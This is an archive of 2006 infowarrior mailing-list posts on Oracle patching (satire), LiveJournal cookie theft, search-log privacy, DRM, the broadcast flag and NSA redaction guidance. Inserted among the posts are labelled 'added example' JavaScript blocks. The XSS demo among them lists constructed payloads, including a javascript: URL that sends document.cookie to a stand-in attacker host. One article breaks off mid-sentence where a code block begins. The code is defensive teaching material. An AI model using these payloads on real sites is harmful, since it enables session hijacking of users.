[infowarrior] - In the interest of helping journalists cover Oracle..
(c/o Jericho) http://www.osvdb.org/blog/?p=86

In the interest of helping journalists cover Oracle.. perhaps they should just move to a templated form to save time?

---

By [YOUR_NAME]
[YOUR TITLE], [YOUR PUBLICATION]
[DATE]

Oracle released on [DAY_OF_WEEK] fixes for a [LONG/HUGE/MONSTROUS] list of security vulnerabilities in [ONE/MANY/ALL] of its products. The quarterly patch contained patches for [NUMBER] vulnerabilities. Titled "Critical Patch Update", the patch provides [FIXES/REMEDIES/MITIGATION] for [NUMBER] flaws in the Database products, [NUMBER] flaws in the Application Server, [NUMBER] flaws in the Collaboration Suite, [NUMBER] of flaws in the E-Business Suite, [NUMBER] of flaws in the PeopleSoft Enterprise Portal, and [NUMBER] of flaws in the [NEW_TECHNOLOGY_OR_ACQUISITION].

Many of the flaws have been deemed critical by Oracle, meaning they are trivial to exploit, were likely discovered around 880 days ago, and are trivially abused by low to moderately skilled [HACKERS/ATTACKERS/CRACKERS].

"[DULL_QUOTE_FROM_COMPANY_WHO_DISCOVERED_NONE_OF_THE_FLAWS]" security company [COMPANY] said yesterday as they upped their internet risk warning system number (IRWSN) to [ARBITRARY_NUMBER]. "This is another example of why our products will help protect customers who chose to deploy Oracle software," [ARBITRARY_CSO_NAME] stated.

"[COMPLETELY_BULLSHIT_QUOTE_ABOUT_PROACTIVE_SECURITY_FROM_ORACLE]," countered Mary Ann Davidson, CSO at Oracle. "These hackers providing us with free security testing and showing their impatience after 880 days are what causes problems. If these jackass criminals would stop being hackers, our products would not be broken into and our customers would stay safe!"

Oracle has been criticized for being slow to fix security flaws by everyone ranging from L0rD D1cKw4v3R to US-CERT to the Pope.

You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe.
This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - Senators threaten new Net porn crackdown
Senators threaten new Net porn crackdown
By Declan McCullagh
http://news.com.com/Senators+threaten+new+Net+porn+crackdown/2100-1028_3-6029005.html
Story last modified Thu Jan 19 16:44:00 PST 2006

WASHINGTON--U.S. senators on Thursday blasted what they called an explosion in Internet pornography and threatened to enact new laws aimed at targeting sexually explicit Web sites.

At an afternoon hearing convened here by the Senate Commerce Committee, Chairman Ted Stevens, an Alaska Republican, lashed out at an adult entertainment industry representative, saying that the industry needs to take swift moves to devise a rating system and to clearly mark all its material as adult only.

"I think any adult producer would agree," said Paul Cambria, counsel to the Adult Freedom Foundation, which represents companies offering lawful adult-oriented entertainment. "It would just be a matter of organizing the industry," he added.

"My advice is you tell your clients they better do it soon, because we'll mandate it if they don't," Stevens said.

Though it wasn't mentioned at the hearing, Web browsers have long supported the Internet standard called PICS, or Platform for Internet Content Selection. Internet Explorer, for instance, permits parents to disable access to Web sites rated as violent or sexually explicit.

Many adult Web sites have voluntarily labeled themselves as sexually explicit. Playboy.com and Penthouse.com, for instance, rate themselves using a variant of PICS created by the nonprofit Internet Content Rating Association.

In addition, mandatory rating systems have frequently been struck down by courts as an affront to the First Amendment's guarantee of freedom of expression. Judges have ruled it unconstitutional for governments to enforce the Motion Picture Association of America's movie-rating system. The Supreme Court has said that the right to speak freely encompasses the right not to speak--including the right not to be forced to self-label.

Sen. Blanche Lincoln, an Arkansas Democrat, talked up her bill that she and a handful of Democrats announced last year. It proposes a 25 percent excise tax on revenue from most adult-oriented sites and a requirement that all such sites use an age-verification system.

"Too few adult Web sites are taking the extra step to create another obstacle, another barrier, that can keep youngsters from accessing or stumbling on pornography," Lincoln said.

The proposals at Thursday's hearing were uncannily reminiscent of similar complaints from politicians a decade ago. In January 1996, Congress approved the Communications Decency Act, which was soundly rejected by the U.S. Supreme Court. Congress also approved a ban on computer-generated child pornography--which was also shot down by the justices on free-speech grounds.

The hearing occurred one day after U.S. Justice Department lawyers filed paperwork in a California federal court in an attempt to force Google to turn over logs from its search engine. The reason, the Justice Department said, is to prepare for an October 2006 trial over a lawsuit from the American Civil Liberties Union challenging the Child Online Protection Act. That 1998 law, which restricts the posting of sexually explicit material deemed "harmful to minors" on commercial Web sites, was effectively frozen through a 2004 Supreme Court decision. The justices forwarded it back to a lower court for a full trial.

"On the Google case, what is your reaction to Google's position that (the Justice Department's request) is an invasion of their privacy?" Sen. Daniel Inouye, the committee's top-ranking Democrat, asked Bush administration representatives.

Deputy Assistant Attorney General Laura Parsky declined to comment, saying it was a dispute currently before the courts. Parsky and an FBI official applauded the idea of new laws, saying they would welcome additional tools from Congress but were doing the best with what they had now.

"But congressional intervention has historically provided anything but a panacea to the availability of pornography online," said Tim Lordan, executive director of the Internet Education Foundation, a nonprofit group that counts representatives from America Online, VeriSign and the World Wide Web Consortium among its board members.

Sen. Inouye of Hawaii took a similarly cautious stance, pointing to a poll that said 70 percent of parents were concerned about pornography but at the same time didn't want the government to step in. "My concern is that this matter has incensed members of Congress to agree that if the industry is not going to act upon it, Congress will," he said. "And often times Congress does a lousy job."
[infowarrior] - DRM Becomes a Balancing Act
DRM Becomes a Balancing Act
By Ed Sutherland
http://www.internetnews.com/stats/article.php/3578746

Companies walk a tightrope when it comes to protecting copyrighted work with Digital Rights Management (DRM), according to a new report.

Sony's recent DRM fiasco highlighted the tightrope content producers are currently walking, according to Ben Macklin of eMarketer. Getting DRM right is made even more important as more people turn to the Internet for audio and video.

By 2008, nearly half of U.S. broadband subscribers (76.5 million people) will use online digital content, according to eMarketer. Just 31 percent of Internet users consumed digital content in 2004.

By 2010, 78 percent of U.S. households will subscribe to broadband, according to Todd Chanko, an analyst with JupiterResearch. (JupiterResearch and internetnews.com are owned by Jupitermedia.)

Television remains the content king, attracting 1 billion households worldwide. New channels for broadband are emerging, with approximately 30 million broadband users accessing online audio and video content each week in the U.S. in order to share or record digital content, according to Macklin.

Content providers can either get a piece of the action, or risk having their content avoided because of tight restrictions from DRM and restrictive terms-of-service agreements, according to the report entitled "Digital Rights Management: Finding the Right Balance."

"Used effectively, DRM technologies have the potential to open up these new channels to traditional publishers and producers," said Macklin.

In November Sony recalled nearly 50 CDs after consumers charged the music giant was using a form of DRM, possibly opening computers to malware.

"Aside from the rootkit, Sony was being generous allowing three copies to be made," said Chanko.

What mistake did Sony make when implementing a DRM for CDs? According to Chanko, it was a "terrifyingly simple" one. "They underestimated the fallout from the impact of their DRM on people's PCs."

He added that an unintended result from the Sony DRM episode may be greater attention by consumers on individual recording companies. Previously, consumers focused on the artist.
[infowarrior] - Account Hijackings Force LiveJournal Changes
http://blogs.washingtonpost.com/securityfix/

Account Hijackings Force LiveJournal Changes

LiveJournal, an online community that boasts nearly 2 million active members, on Thursday announced sitewide changes for users logging into their accounts -- changes prompted by a hacker group's successful hijacking of potentially hundreds of thousands of user accounts.

In an alert posted to its user forum, LiveJournal said it was instituting new login procedures for users because "recent changes to a popular browser have enabled malicious users to potentially gain control of your account." Company officials could not be immediately reached for comment. I also put in a query to Six Apart, which owns LiveJournal (and the service we use to produce this blog), but have yet to hear from them either.

An established hacker group known as Bantown (I would not recommend visiting their site at work) claimed responsibility for the break-in, which it said was made possible due to a series of Javascript security flaws in the LiveJournal site. A trusted source in the security community put me in touch with this group, and several Bantown members spoke at length in an online instant-message chat with Security Fix. During the chat, members of the group claimed to have used the Javascript holes to hijack more than 900,000 LiveJournal accounts. (Although I quote some of them in this post, I have chosen to omit their individual hacker handles -- not because we're trying to protect their identities, but because a few of them could be considered a tad obscene.)

LiveJournal's stats page says the company has more than 9.2 million registered accounts, but that only 1.9 million of them are active in some way. The largest percentage of users are located in the United States and Russia.

Bantown members said they created hundreds of dummy member accounts featuring Web links that used the Javascript flaws to steal cookies (small text files on a Web-browsing computer that can be used to identify the user) from people who clicked on the links. Armed with those cookies, the hackers were then able to either log in as the victim, or arbitrarily post or delete entries on the victim's personal page.

"It is impossible to know how many of these are nonfunctional, but we have an 85% success rate on usage, so it may be fair to state that 85% of those are valid," one member of Bantown told Security Fix. "However, we have only used approximately five hundred of these cookies so far, so it is impossible to tell whether this sample is statistically valid. Still, a massive number have been compromised."

Normally, sites like LiveJournal prohibit the automated creation of accounts by using so-called "captcha" images, online Turing Tests that require the user to read a series of slightly malformed numbers and letters and input them into a Web site form before a new account can be created. The idea is to stymie automated programs created by spammers who try to register new accounts for the sole purpose of using them to hawk their wares. But Bantown claims to have figured out a way to subvert that test, and to have even released a free, open-source program that others could use to do the same.

According to Bantown, the group has been doing this for months, and LiveJournal was only alerted to the problem after the specially crafted URLs the hackers created started setting off antivirus warnings when some users clicked on the links.

"What eventually led LiveJournal to discover and patch our first vulnerability is that McAfee's full [computer security] suite actually has some preliminary protection against cross-site scripting attacks," one group member said.

It is unclear whether LiveJournal has managed to close the security holes that the hackers claim to have used. The company says it has, but the hackers insist there are still at least 16 other similar Javascript flaws on the LiveJournal site that could be used to conduct the same attack. Group members said they plan to turn their attention to looking for similar flaws at another large social-networking site.

Anytime you have large groups of computer users aggregating at such places, they are going to be seen as a target-rich environment by hackers and hacker groups. Over the past several months, a number of exploits have been released to help users or attackers circumvent the security of online forums. So far, the damage has been mostly harmless. The most high-profile case so far came in mid-October when one Myspace.com user released a self-replicating computer worm that took advantage of Javascript flaws to add more than a million fellow users to his buddy list. A similar worm hit the online community Xanga on New Year's eve (there is also some strong language at this link.)
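The attack the group describes, a link planted in a dummy account that runs script in the victim's browser and ships document.cookie off to the attacker, comes down to a site printing user-supplied markup without escaping it. Below is an added example in JavaScript (runs under Node.js) showing that bug class and one renderer that closes it. It is not LiveJournal's or Bantown's code and does not reproduce the specific LiveJournal flaws, which the article does not detail; the function names, attacker URLs and hostnames are constructed for the example.

```javascript
// Added example, not code from LiveJournal or Bantown. Shows a link renderer
// that prints user input unescaped (the bug class behind cookie theft via
// a planted link) beside a renderer that allowlists the URL scheme and
// escapes on output. All inputs below are constructed.

// Vulnerable: the user's values go straight into the markup.
function renderLinkVulnerable(href, text) {
  return `<a href="${href}">${text}</a>`;
}

// Escape the characters that can end an attribute or start a tag.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Extract the URL scheme the way a browser would: strip the control and
// whitespace characters browsers ignore inside a scheme, then lower-case,
// so "jAvA\tscript:" is recognised as "javascript".
function schemeOf(url) {
  const cleaned = String(url).replace(/[\x00-\x20]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist, not denylist: only http, https and relative URLs survive.
function isSafeHref(href) {
  const scheme = schemeOf(href);
  return scheme === null || scheme === "http" || scheme === "https";
}

// Hardened: decide on the raw value, then escape everything printed.
// An entity-encoded scheme ("&#106;avascript:") has no scheme in raw form,
// passes the check, and is then escaped into literal text the browser
// never decodes back into a scheme.
function renderLinkHardened(href, text) {
  const safeHref = isSafeHref(href) ? href : "#";
  return `<a href="${escapeHtml(safeHref)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
}

// Constructed attacker inputs of the kind a dummy profile would carry.
const ATTACKS = {
  cookieTheft: "javascript:new Image().src='http://attacker.invalid/c?'+document.cookie",
  tabObfuscated: "jAvA\tscript:alert(document.cookie)",
  entityEncoded: "&#106;avascript:alert(1)",
  attrBreakout: 'http://ok.invalid/" onmouseover="alert(document.cookie)',
  dataUrl: "data:text/html,<script>alert(1)</script>",
};

// Approximate what a browser does with the rendered href: decode numeric
// character references, then resolve the scheme with the same normalisation.
// Also flag an injected event-handler attribute.
function hrefLeaks(html) {
  const m = /href="([^"]*)"/.exec(html);
  if (!m) return false;
  const decoded = m[1].replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
  const scheme = schemeOf(decoded);
  return scheme === "javascript" || scheme === "data" || / on[a-z]+="/i.test(html);
}

// Run every attack through a renderer; returns {attackName: leaked?}.
function evaluate(render) {
  const leaks = {};
  for (const [name, href] of Object.entries(ATTACKS)) {
    leaks[name] = hrefLeaks(render(href, "cute kittens"));
  }
  return leaks;
}
```

Escaping alone is not a fix here: a plain javascript: URL contains nothing that HTML escaping touches, so the scheme allowlist is what closes that path, and the escaping is what stops the attribute breakout. Marking the session cookie HttpOnly is the complementary server-side measure: script then cannot read it, so an injected handler has nothing to exfiltrate, though it can still act inside the victim's session from within the page.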
[infowarrior] - How to Foil Search Engine Snoops
How to Foil Search Engine Snoops
http://www.wired.com/news/technology/1,70051-0.html
By Ryan Singel

On Thursday, The Mercury News reported that the Justice Department has subpoenaed search-engine records in its defense of the Child Online Protection Act, or COPA. Google, whose corporate credo famously includes the admonishment "Don't Be Evil," is fighting the request for a week's worth of search engine queries. Other search engines have already complied.

The government isn't asking for search engine users' identifying data -- at least not yet. But for those worried about what companies or federal investigators might do with such records in the future, here's a primer on how search logs work, and how to avoid being writ large within them.

Why do search engines save logs of search terms?

Search companies use logs and data-mining techniques to tune their engines and deliver focused advertising, as well as to create cool features such as Google Zeitgeist. They also use them to help with local searches and return more relevant, personalized search results.

How does a search engine tie a search to a user?

If you have never logged in to a search engine's site, or a partner service like Google's Gmail offering, the company probably doesn't know your name. But it connects your searches through a cookie, which has a unique identifying number. Using its cookies, Google will remember all searches from your browser. It might also link searches by a user's IP address.

How long do cookies last?

It varies. Yahoo sets a cookie that expires in June 2006. A new cookie from Google expires in 2036.

What if you sign in to a service?

If you sign in on Google's personalized homepage or Yahoo's homepage, the companies can then correlate your search history with any other information, such as your name, that you give them.

Why should anyone worry about the government requesting search logs or bother to disguise their search history?

Some people simply don't like the idea of their search history being tied to their personal lives. Others don't know what the information could be used for, but worry that the search companies could find surprising uses for that data that may invade privacy in the future. For example, if you use Google's Gmail and web optimizing software, the company could correlate everyone you've e-mailed, all the websites you've visited after a search and even all the words you misspell in queries.

What's the first thing people should do who worry about their search history?

Cookie management helps. Those who want to avoid a permanent record should delete their cookies at least once a week. Other options might be to obliterate certain cookies when a browser is closed and avoid logging in to other services, such as web mail, offered by a search engine.

How do you do that with your browser?

In Firefox, you can go into the privacy preference dialog and open Cookies. From there you can remove your search engine cookies and click the box that says: "Don't allow sites that set removed cookies to set future cookies."

In Safari, try the free and versatile PithHelmet plug-in. You can let some cookies in temporarily, decide that some can last longer or prohibit some sites, including third-party advertisers, from setting cookies at all.

While Internet Explorer's tools are not quite as flexible, you can manage your cookies through the Tools menu by following these instructions.

Have search histories ever been used to prosecute someone?

Robert Petrick was convicted in November 2005 of murdering his wife, in part based on evidence that he had googled the words "neck," "snap" and "break." But police obtained his search history from an examination of his computer, not from Google.

Can I see mine?

Usually, no. But if you want to trace your own Google search histories and see trends, and you don't mind if the company uses the information to personalize search results, you can sign up for Google's beta search history service.

Could search histories be used in civil cases?

Certainly. Google may well be fighting the government simply on principle -- or, as court papers suggest, to keep outsiders from using Google's proprietary database for free. But a business case can also be made that if users knew the company regularly turned over their records wholesale to the government, they might curtail their use of the site. A related question is whether Google or any other search engine would fight a subpoena from a divorce attorney, or protest a more focused subpoena from local police who want information on someone they say is making methamphetamines.

What if I want more anonymity than simply deleting my cookie when I'm searching?

If you are doing any search you wouldn't print on a T-shirt, consider using Tor, The Onion Router. An EFF-sponsored service, Tor helps anonymize your web traffic by bouncing it between volunteer servers. It masks the origins and makes it easier to evade filters, such as those installed by
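The cookie-management advice in the article (drop search-engine cookies on a schedule, or let them live only for the session) can be expressed as a policy over the raw Set-Cookie headers a site sends, which is what an extension such as the Safari plug-in mentioned above does under the hood. Below is an added example in JavaScript (Node.js) that is not from the article or from any browser or plug-in. The headers, cookie names and domains are constructed; the two expiry dates mirror the "June 2006" and "2036" lifetimes the article cites, and the cutoff of seven days follows its once-a-week advice.

```javascript
// Added example, not from the article or any browser. Parses Set-Cookie
// headers, measures each cookie's remaining lifetime, and decides which
// ones from tracked domains should live only until the browser closes.
// Sample headers, domains and dates are constructed for the example.

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Remaining lifetime in days as of `now`; null means "session cookie".
// Max-Age takes precedence over Expires, as RFC 6265 specifies.
function lifetimeDays(cookie, now) {
  if ("max-age" in cookie.attrs) return Number(cookie.attrs["max-age"]) / 86400;
  if ("expires" in cookie.attrs) {
    const t = Date.parse(cookie.attrs.expires);
    return Number.isNaN(t) ? null : (t - now.getTime()) / 86400000;
  }
  return null;
}

// True when `domain` is one of the tracked domains or a subdomain of one.
function isTracked(domain, trackedDomains) {
  return trackedDomains.some((d) => domain === d || domain.endsWith("." + d));
}

// Decide what to do with one cookie: a long-lived cookie from a tracked
// domain is kept only until the browser closes; everything else is left alone.
function applyPolicy(header, now, trackedDomains, maxDays) {
  const c = parseSetCookie(header);
  const domain = (c.attrs.domain || "").replace(/^\./, "").toLowerCase();
  const days = lifetimeDays(c, now);
  let verdict = "keep";
  if (days === null) verdict = "session";
  else if (days > maxDays && isTracked(domain, trackedDomains)) verdict = "downgrade-to-session";
  return { name: c.name, domain, days: days === null ? null : Math.round(days), verdict };
}

// Rewrite a header so the cookie dies with the session: drop Expires and Max-Age.
function toSessionCookie(header) {
  return header.split(";").map((s) => s.trim())
    .filter((a) => !/^(expires|max-age)=/i.test(a)).join("; ");
}

// Constructed headers; the first two mimic the lifetimes the article cites.
const SAMPLE_HEADERS = [
  "PREF=ID=0123456789abcdef; expires=Thu, 17 Jan 2036 19:14:07 GMT; path=/; domain=.google.com",
  "B=abc123; expires=Fri, 30 Jun 2006 00:00:00 GMT; path=/; domain=.yahoo.com",
  "session=xyz; path=/; domain=www.example.invalid; HttpOnly",
  "prefs=dark; max-age=604800; domain=www.example.invalid",
];

// Audit the sample as of the article's date with a one-week cutoff.
function audit(now = new Date("2006-01-20T00:00:00Z"), tracked = ["google.com", "yahoo.com"], maxDays = 7) {
  return SAMPLE_HEADERS.map((h) => applyPolicy(h, now, tracked, maxDays));
}
```

Downgrading rather than blocking keeps the site working for the rest of the visit while the identifier the article worries about is discarded at exit; a cookie arriving with neither Expires nor Max-Age already behaves that way. Note that this policy says nothing about the IP-address linkage the article also mentions, which no cookie setting addresses.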
[infowarrior] - New Senate Broadcast Flag Bill Would Freeze Fair Use
New Senate Broadcast Flag Bill Would Freeze Fair Use
January 20, 2006
http://www.eff.org/deeplinks/archives/004340.php

Draft legislation making the rounds in the U.S. Senate gives us a preview of the MPAA and RIAA's next target: your television and radio.

You say you want the power to time-shift and space-shift TV and radio? You say you want tomorrow's innovators to invent new TV and radio gizmos you haven't thought of yet, the same way the pioneers behind the VCR, TiVo, and the iPod did? Well, that's not what the entertainment industry has in mind. According to them, here's all tomorrow's innovators should be allowed to offer you: "customary historic use of broadcast content by consumers to the extent such use is consistent with applicable law."

Had that been the law in 1970, there would never have been a VCR. Had it been the law in 1990, no TiVo. In 2000, no iPod.

Fair use has always been a forward-looking doctrine. It was meant to leave room for new uses, not merely "customary historic" uses. Sony was entitled to build the VCR first, and resolve the fair use questions in court later. This arrangement has worked well for all involved -- consumers, media moguls, and high technology companies.

Now the RIAA and MPAA want to betray that legacy by passing laws that will regulate new technologies in advance and freeze fair use forever. If it wasn't a "customary historic use," federal regulators will be empowered to ban the feature, prohibiting innovators from offering it. If the feature is banned, courts will never have an opportunity to pass on whether the activity is a fair use. Voila, fair use is frozen in time. We'll continue to have devices that ape the VCRs and cassette decks of the past, but new gizmos will have to be submitted to the FCC for approval, where MPAA and RIAA lobbyists can kill it in the crib.

The new legislation, being circulated by Senator Gordon Smith (R-Ore.), is the first step down that path (and is eerily reminiscent of the infamous 2002 Hollings Bill). It would impose a broadcast flag mandate on all future digital TVs and radios, much like legislation discussed by the House last year. We've covered the broadcast flag and radio flag extensively in the past. These measures would impose federal regulations on all devices capable of receiving digital television and digital radio signals. What's worse, the regulations won't do a thing to stop piracy, since there are plenty of other ways to copy these broadcasts.

Sen. Smith's bill would retroactively ratify the FCC's broadcast flag regulations, rejected by the courts last year. This effort to impose content protection mechanisms in all future TVs is still just as terrible an idea now as ever.

The bill would also give the FCC authority to regulate the design of digital radios (both terrestrial HD Radio and XM and Sirius satellite). The bill envisions an inter-industry negotiation with a preordained outcome -- federal regulations mandating content protection mechanisms in all future HD Radio and satellite radio receivers. The FCC regulations could make room for "customary historic uses of broadcast content by consumers to the extent such use is consistent with applicable law." Presumably, that means you could design a digital device just as good as an analog cassette deck, but no better.

Sorry, Sen. Smith, but American innovators and music fans deserve better.
[infowarrior] - NSA Guide to Sanitizing Word and PDF documents
(c/o Secrecy News)

The National Security Agency has issued new guidance to assist officials in redacting (censoring) documents in Microsoft Word format and producing unclassified Adobe Portable Document (PDF) files without inadvertently disclosing sensitive information.

MS Word is used throughout the DoD and the Intelligence Community (IC) for preparing documents, reports, notes, and other formal and informal materials. PDF is often used as the format for downgraded or sanitized documents.

There are a number of pitfalls for the person attempting to sanitize a Word document for release. For example, "As numerous people have learned to their chagrin, merely converting an MS Word document to PDF does not remove all [sensitive] metadata automatically."

"This paper describes the issue, and gives a step-by-step description of how to do it with confidence that inappropriate material will not be released."

See "Redacting with Confidence: How to Safely Publish Sanitized Reports Converted From Word to PDF," National Security Agency, December 13, 2005:

http://www.fas.org/sgp/othergov/dod/nsa-redact.pdf
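The metadata the NSA paper warns about sits in two places in a PDF produced from Word: the document Info dictionary referenced from the trailer (Title, Author, Creator, Producer and dates) and, in newer files, an XMP metadata stream. Below is an added example in JavaScript (Node.js) that scans a PDF for both and reports what it finds, a check to run on the output before release. It is not the NSA's tooling. It assumes the objects are stored uncompressed and strings are literal, as in the constructed skeleton it ships with; a PDF that packs its objects into compressed object streams, or uses hex or UTF-16 strings, needs a real PDF parser, and a silent result from this scan on such a file means "not inspected," not "clean." It also says nothing about redaction of the page content itself, which the paper covers separately.

```javascript
// Added example, not the NSA's code: scan a PDF's raw bytes (as a latin1
// string) for the document Info dictionary and an XMP metadata stream and
// report the fields a Word-to-PDF conversion tends to leave behind.
// Assumes uncompressed objects and literal strings; the sample is constructed.

const INFO_KEYS = ["Title", "Author", "Subject", "Keywords", "Creator", "Producer", "CreationDate", "ModDate"];

// Follow the trailer's "/Info n g R" reference to that object's dictionary.
function findInfoDict(pdf) {
  const ref = /\/Info\s+(\d+)\s+(\d+)\s+R/.exec(pdf);
  if (!ref) return null;
  const re = new RegExp(`(?:^|\\s)${ref[1]}\\s+${ref[2]}\\s+obj\\s*<<([\\s\\S]*?)>>\\s*endobj`);
  const m = re.exec(pdf);
  return m ? m[1] : null;
}

// Pull literal-string values "(...)" for the known Info keys, unescaping
// the backslash escapes PDF uses for parentheses and backslashes.
function infoFields(dict) {
  const out = {};
  for (const k of INFO_KEYS) {
    const m = new RegExp(`/${k}\\s*\\(((?:\\\\.|[^\\\\)])*)\\)`).exec(dict);
    if (m) out[k] = m[1].replace(/\\([()\\])/g, "$1");
  }
  return out;
}

// Simple-element XMP properties plus the dc:creator sequence.
function xmpFields(pdf) {
  const out = {};
  const block = /<x:xmpmeta[\s\S]*?<\/x:xmpmeta>/.exec(pdf);
  if (!block) return out;
  const xmp = block[0];
  const re = /<((?:xmp|pdf|xmpMM):[A-Za-z]+)>([^<]*)<\/\1>/g;
  let m;
  while ((m = re.exec(xmp)) !== null) out[m[1]] = m[2];
  const creator = /<dc:creator>([\s\S]*?)<\/dc:creator>/.exec(xmp);
  if (creator) out["dc:creator"] = [...creator[1].matchAll(/<rdf:li>([^<]*)<\/rdf:li>/g)].map((x) => x[1]);
  return out;
}

// Everything an author might not want shipped with a "sanitized" report.
function leakedMetadata(pdf) {
  const info = findInfoDict(pdf);
  return { info: info ? infoFields(info) : {}, xmp: xmpFields(pdf) };
}

// Constructed skeleton of a converter's output (not a complete, valid PDF):
// the author and the creating application are still present in both places.
const SAMPLE_PDF = `%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Metadata 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Title (Sanitized Report \\(Draft 7\\)) /Author (J. Analyst) /Creator (Microsoft Word) /Producer (Acrobat Distiller) >> endobj
4 0 obj << /Type /Metadata /Subtype /XML >>
stream
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF><rdf:Description>
<xmp:CreatorTool>Microsoft Word</xmp:CreatorTool>
<dc:creator><rdf:Seq><rdf:li>J. Analyst</rdf:li></rdf:Seq></dc:creator>
</rdf:Description></rdf:RDF></x:xmpmeta>
endstream
endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF`;
```

To run it on a real file, read the file with encoding "latin1" so each byte maps to one character and pass the string to leakedMetadata. Removing the Info dictionary is not enough on its own: the XMP stream carries the same names, and the paper's point is that the conversion step removes neither unless you tell it to.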
[infowarrior] - Security Firm Offers Ad Space In Bug Report
Security Firm Offers Ad Space In Bug Report
http://internetweek.cmp.com/showArticle.jhtml?articleId=177102488
By Gregg Keizer
Courtesy of TechWeb News

An anonymous security researcher who tried to sell an Excel vulnerability on eBay last month now stands to make more than $600 in an auction of ad space in the report issued when the bug is fixed by Microsoft.

In early December, someone identified only by the eBay member name "fearwall" posted the spreadsheet vulnerability on the online auction service, which yanked the listing when the bidding reached $60. Microsoft later confirmed the vulnerability in Excel and said it was investigating the problem, but wouldn't commit to patching it.

The researcher is now working with security company HexView, which plans to release a full analysis of the bug once Microsoft publishes a patch. The caveat: the analysis will include two 400-character text ads for products chosen by the two highest bidders in a private auction.

"Do not miss your chance to get noticed," HexView said in a statement posted to its Web site. "Our disclosure is expected to draw the attention of many people, including your prospective customers. The ad will be published as a 400-character paragraph within the disclosure called 'You may also find interesting.'"

Bidding begins at $600, said HexView, and will be conducted via e-mail.

The proceeds will be split between fearwall and HexView, said Max Solonski, a principal consultant with the company, in an e-mail interview. "It is not 50/50, and 'fearwall' takes the greater chunk since it was his idea," said Solonski. "He also seems to be obsessed with open source donations and the vast amount of the collected funds may go that way."

Not even HexView is sure if the concept of advertising in a bug report is a viable way to turn vulnerability research into cash.

"While it seems logical to advertise products that address the vulnerability along with the description of the vulnerability, it may as well affect the image of the advertiser since vulnerability disclosures are commonly considered 'a bad thing,'" said Solonski.

The concept of paying for vulnerabilities, however, isn't new. Better known security companies such as iDefense (part of VeriSign) and TippingPoint (part of 3Com) pay bounties on bugs reported to their research teams, and crow when the program bears fruit.